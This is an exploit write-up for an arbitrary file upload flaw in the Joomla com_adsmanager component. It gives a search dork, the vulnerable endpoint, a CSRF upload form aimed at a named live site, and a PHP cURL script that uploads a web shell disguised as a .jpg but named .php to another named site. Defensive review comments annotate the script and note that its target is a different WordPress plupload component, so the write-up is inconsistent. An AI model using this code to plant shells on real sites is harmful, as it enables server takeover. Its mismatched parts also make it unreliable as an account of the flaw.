#- Dork : inurl:com_adsmanager
#- Exploit : /index.php?option=com_adsmanager&task=upload&tmpl=component
#- Vulnerable :
{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_5"}
*Note : Jangan lupa Edit Shellnya Shell.jpg
POC :
With CSRF / Uploadify
CSRF :
<form method="POST" action="http://www.muslimbizads.com/index.php?option=com_adsmanager&task=upload&tmpl=component"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>
Uploadify :
// Proof-of-concept request: builds one multipart/form-data POST, sends it to $url with cURL,
// and prints whatever the server answers.
// NOTE(review): this URL is a plupload example upload.php under a WordPress plugin path, not the
// com_adsmanager task=upload endpoint named at the top of the page; the two parts of the
// write-up describe different components.
$url = "http://shelbygrossman.com/wp-content/plugins/the-viddler-wordpress-plugin/js/plupload/examples/upload.php"; // put URL Here
// Form fields. The file content is read from a .jpg on disk, while the separate "name" field
// asks for a .php filename. The request only matters if the receiving handler trusts that
// client-supplied name. Defensive takeaway: an upload handler should choose the stored name
// and extension itself from an allow-list, and the upload directory should not execute scripts.
$post = array
(
"file" => "@jiwax.jpg", // leading "@" is the legacy PHP cURL convention for attaching a local file
"name" => "jiwa.php"
);
$ch = curl_init ("$url");
// Return the response body as a string instead of writing it straight to output.
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
// Follow HTTP redirects issued by the server.
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
// Fixed, browser-like User-Agent; in access logs this static string paired with a POST to an
// upload endpoint is a weak but usable detection indicator.
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
// Give up if the connection is not established within 5 seconds.
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
// TLS certificate and host-name verification are both switched off.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
// The "@" operator silences any warning raised while the POST fields are set.
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
// curl_exec() returns false on failure; the result is not checked before it is echoed.
$data = curl_exec ($ch);
curl_close ($ch);
// The server response is printed as-is, without escaping.
echo $data;
?>